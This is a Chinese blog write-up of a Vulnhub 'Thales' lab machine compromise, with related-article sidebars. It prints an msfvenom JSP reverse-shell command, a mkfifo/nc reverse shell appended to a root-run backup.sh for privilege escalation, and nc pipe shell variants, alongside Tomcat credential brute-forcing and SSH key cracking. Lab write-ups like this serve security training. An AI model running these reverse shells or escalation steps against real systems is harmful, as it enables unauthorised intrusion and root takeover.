Thales 靶场渗透记录

最新推荐文章于 2024-02-04 22:55:16 发布
最新推荐文章于 2024-02-04 22:55:16 发布
阅读量920 收藏
点赞数 1
分类专栏: 靶场渗透攻略向 文章标签: tomcat 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fffhhdd/article/details/127330390
版权

Thales 靶场渗透记录

一、ip

arp-scan扫靶场端口

image-20221014230748157

1、攻击机:Kali ip:192.168.142.128

​ 靶机:? ip:192.168.56.135

二、日常扫端口

image-20221014231044027

开放端口 22 和 8080 , 还可以看到有开放tomcat

进去网页看看tomcat

image-20221014231311975

正常显示

image-20221014231340077

可以正常登录

image-20221014231523476

打开msfconsole,msf的界面还是如此霸气!

搜索一下,msf用的不熟练,但是这个东西是确实牛逼的~~

翻资料,先去search来搜索tomcat模块,发现搜出一堆,攻略了下,search tomcat login 会针对登录模块搜索

image-20221014231844574

找到一个,应该就是用这个模块,接下来=。= 继续查资料,然后use 选择使用的模块(一步一步查=。=)

image-20221014232151856

show payloads 显示所有攻击载荷,但是发现check全是no,不知道是不是不能用,研究了下,不懂~

攻略了下,show options 可以显示模块所需参数,发现有些是yes有些是no,查了查资料,show options是显示出该模块的参数是否设置完整,不知道这样行不行,先设置了RHOST,即靶机的ip

image-20221014233221388

run 命令开始攻击!

image-20221014233326089

就成功一个,但是发现login,successful,后面是tomcat role1 ,用户名密码?拿去登陆一下

image-20221014233527970

进来了~~~舒服!

image-20221014233859826

卡住了,攻略了,发现要利用这个上传文件的功能,上传木马上去

三、msf上传木马反弹shell
msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.56.128 lport=5678  -f war -o myshell.war

-p是指定payloads,但是后门这个不太懂,应该是固定的payload名称,从名字猜应该是java/jsp的反转shell用的,lhost是kali ip,lport是端口,-f是生成文件类型,-o输出的文件名

image-20221014235141757

可以看到已经生成了,下来上传tomcat中去,得用kali打开tomcat , 好卡~~~~~!!!!

image-20221014235416919

搞定了,点一下看能不能反转shell

image-20221014235456227

白的,啥也没有~~~enmmmmmm,想了想,应该是kali要监听一下,不然设置那个端口干嘛,再试试

image-20221014235602093

image-20221014235634531

又运行了下,果然收到了!!爽!

image-20221014235812814

确实反弹回来了!但是没发现什么=。= |||

卡关了,攻略了下,先要转为交互式shell,现在这个shell确实很难受

python3 -c "import pty;pty.spawn('/bin/bash')"

这句代码也不知道什么意思,先记住吧~~

image-20221015000917157

还是没看到什么有用信息,sudo -l 又需要密码,无法执行

image-20221015001101253

进去了thales里面,看到notes.txt,cat了一下,发现一句话

I prepared a backup script for you. The script is in this directory “/usr/local/bin/backup.sh”. Good Luck.

译:我为你准备了一个后门脚本,这个脚本在路径:/usr/local/bin/backup.sh 祝你好运!

既然提示了,那就去执行一下这个脚本

image-20221015001916553

执行了一下,cat了一下,都没发现啥东西,醉了呀!!!!

image-20221015002351338

四、发现id_rsa公钥

不得已又回去了

image-20221015002501612

发现了ssh,进去了后,发现id_rsa,这个后上一个靶场那个john公钥是一个名字,那就代表可以用john来爆破,算是有线索了

image-20221015003105775

回到kali,复制了这个密码到id_rsa,然后按照上次一样来爆破

image-20221015004012453

拿到密码vodka06,试试登录

image-20221015004310860

成功!!!!user.txt里面拿到第一把旗!

五、提权

1、这会想起之前那个执行文件/usr/local/bin/backup.sh这个文件,可以效仿之前,去echo进去反弹shell的代码,看看是否能提权

2、回到之前这个文件,查看一下权限可以编辑

image-20221015004749733

反弹shell咋写来着,忘记了~~回去找找之前的

之前的写入后,反弹回来的是thales用户,不行!无奈~又去攻略,得到大佬代码

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.128 1234 >/tmp/f" >> backup.sh

写入了这行shell,过了一会反弹回来了

image-20221015012049371

拿到root权限,这行shell完全不懂~~~~查查资料!

只查到这些资料,enmmmmmm,还是没懂。这个提权得找个时间好好学习一下~~~

基于匿名管道(pipe)传递指令流

nc 192.168.43.146 7777 | /bin/bash | nc 192.168.43.146 8888

基于命名管道(fifo)
fifo是命名管道也被称为FIFO文件,它是一种特殊类型的文件,它在文件系统中以文件名的形式存在(因为多个进程要识别),它的行为和匿名管道类似(一端读一端写),但是FIFO文件也不在磁盘进行存储。一般用于进程间的通信。

 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i >&|nc 110.211.55.2  >/tmp/f

    1

mkfifo 命令首先创建了一个管道
cat 将管道里面的内容输出传递给/bin/sh
sh会执行管道里的命令并将标准输出和标准错误输出结果通过 nc 传到该管道,由此形成了一个回路
PuPPET ER
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Seattle-Loop-Data
05-28
西雅图感应环路检测器数据集V.1(2015) 全网流量预测数据集 数据由部署在西雅图地区高速公路上的感应式环路检测器收集。 高速公路包含I-5,I-405,I-90和SR-520,如上图所示。 该数据集包含高速公路系统的时空速度信息。 在图片中,每个蓝色图标在一个里程碑处都展示了环路检测器。 里程点的速度信息是从主航线上多个环路探测器沿特定里程点的相同方向求平均的。 数据集的时间间隔为5分钟。 数据下载链接包含文件列表: speed_matrix_2015 :循环速度矩阵,这是一个腌制的文件,可以由熊猫或其他python包读取。 Loop_Seattle_2015_A.npy :循环邻接矩阵,它是一个numpy矩阵,用于以图形形式描述交通网络结构。 Loop_Seattle_2015_reachability_free_flow_Xmin.npy :在X minites的驱动器中循
thales
03-26
Thales,这个名字源于古希腊哲学家泰勒斯(Thales of Miletus),在现代则被用作一家全球领先的科技公司——泰雷兹(Thales Group)的名称。Thales集团是一家法国跨国企业,专注于为航空、国防、安全和太空等行业...
【Vulnhub靶场THALES: 1
DG_s1mple
03-17 3043
环境准备 下载靶机导入到vmware 信息收集 我们使用arp-scan命令查找靶机的IP地址 靶机IP地址为:192.168.2.18 攻击机IP地址为:192.168.2.17 我们使用nmap扫描靶机开启的服务 发现靶机开放了tomcat和ssh,我们先访问他的tomcat 渗透开始 tomcat发现可以登录,我们尝试爆破一下 成功爆破出账号密码,我们返回网站登录 发现manager app页面可以上传文件 我们使用如下命令创建一个反弹shell的木马上传 msfvenom -p ja
Arp-scan&Nmap&gobuster&wfuzz常用参数
qq_43534481的博客
08-23 557
Arp-scan&Nmap&gobuster&wfuzz用法
内网渗透之信息收集
qq_48904485的博客
04-25 5966
内网信息收集 一、内网信息收集概述 渗透测试人员进人内网后,面对的是一片“黑暗森林”。所以,渗透测试人员首先需要对当前所处的网络环境进行判断。判断涉及如下三个方面。 我是谁?一对 当前机器角色的判断。 这是哪?一对 当前机器所处网络环境的拓扑结构进行分析和判断。 我在哪?一对 当前机器所处区域的判断。 对当前机器角色的判断,是指判断当前机器是普通Web服务器、开发测试服务器、公共服务器、文件服务器、代理服务器、DNS服务器还是存储服务器等。具体的判断过程,是根据机器的主机名、文件、网络连接等情况综合完成
Vulnhub——THALES: 1靶场
Re1_zf的博客
11-15 813
1、msfvenom生成反弹shell的war文件2、python脚本转换公钥文件为JTR攻击兼容文件python3 ssh2john.py 需要处理的文件 > 输出的文件3、john爆破ssh公钥(基于JTR攻击兼容文件)john --wordlist=/usr/share/wordlists/rockyou.txt 爆破文件4、利用mkfifo命令实现权限维持mkfifo创建的是一个管道文件,这里这种情况下这个文件中的内容会实时更新,即输入的命令会被实时读取。
THALES
10-24
"THALES"是一个可能与字体相关的主题,但提供的信息相当有限。在IT行业中,字体通常涉及到文本显示、排版设计、编程以及用户界面等多个领域。THALES这个名字本身并不直接指向一个特定的字体或技术,因此我们需要进行...
Thales(泰勒兹)基于模型的系统工程方法论
08-15
### 泰勒兹集团(Thales)基于模型的系统工程方法论 #### 前言 本篇文档介绍的是泰勒兹集团所采用的一种基于模型的系统工程方法论——Arcadia。该方法论由Jean-Luc Voirin、Stéphane Bonnet 和 Daniel Exertier 等...
HSM-Basics.pdf.tar.gz_HSM_HSM thales
07-14
Thales HSM Basics. How to interface with HSM device
Thales Corporate_Brochure
11-24
international innovation partnerships responsibility aerospace space defence security
vulhub thales:1 靶场
GRXHunter的博客
04-12 3446
vulhub thales:1靶场
vulnhub靶场Thales
最新发布
qq_58091216的博客
02-04 985
我们看到了两个txt文件,模式里面提示我们,一个flag在user.txt,一个在root.txt里面,那么我们进行查看user.txt文件,但是需要thales权限,我们查看notes.txt文件,notes.txt 中告诉我们有一个备用脚本在 /usr/local/bin/backup.sh。一般情况下,我们首先去home目录下查看,然后在去/var/www/html/目录下查看有没有什么线索,我们看到了thales命令,我们进行查看。我们在thales目录下发现了隐藏的.ssh文件,我们进行查看。
Linux-----arp-scan命令
hekewangzi
07-25 4410
靶机渗透练习12-Thales
hirak0的博客
04-15 1426
靶机描述 靶机地址:https://www.vulnhub.com/entry/thales-1,749/ Description Description : Open your eyes and change your perspective includes 2 flags:user.txt and root.txt. Telegram: @machineboy141 (for any hint) This works better with VIrtualBox rathe than VMware
vulnhub靶机-THALES: 1
臭nana的博客
03-18 4591
1、找到靶机ip:192.168.1.106 nmap -sn 192.168.1.0/24 2、扫描靶机端口,开放22和8080端口 3、先搜索对应中间件有没有公开漏洞,没有发现,于是先从8080端口入手,访问之后是一个tomcat服务默认页面,先扫描一下目录 可疑的就只有shell目录,但是访问就一直转圈,跟平常反弹shell的页面一样,所以猜测应该是作者测试时上传的,结合tomcat和shell目录,可以猜想应该是tomcat后台布置war包getshell,但是管理后台需要...
云服务器Linux被暴力破解处理方案
sinat_39613288的博客
01-28 973
【笔记】ssh端口通过私钥认证爆破
jiji_king的博客
06-16 1729
笔记 ssh 私钥登录
渗透测试笔记——暴力破解、ssh公钥权限维持、GPU Wakuang程序(靶机系统:ubuntu)
W小哥
02-17 1832
本次实验主要是为了应急响应打基础,从攻击者的角度出发,知己知彼,百战不殆
Vulnhub-thales靶机
lionwerson的博客
12-03 755
thales下载地址https://download.vulnhub.com/thales/Thales.zip1.导入virtual box,网络改为桥接模式,打开虚拟机。 2.nmap扫描一下端口: 开放了8080端口和22端口。 3.浏览器打开8080端口: 服务是tomcat,版本是9.0.52,没有任意文件读取和写入的漏洞,只能爆破manager app认证 4.burp认证爆破,tomcat的账号和密码格式是【用户名:密码】然后经过base64加密进行发送: ..
Thales Cadence介绍与实施原则
"这份文档是关于MBSE(Model-Based Systems Engineering,基于模型的系统工程)工具Capella的相关资料,由Thales集团发布。文档主要介绍了Cadence,它可能是一个与Capella相关的软件或插件。内容包括对Cadence的介绍...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值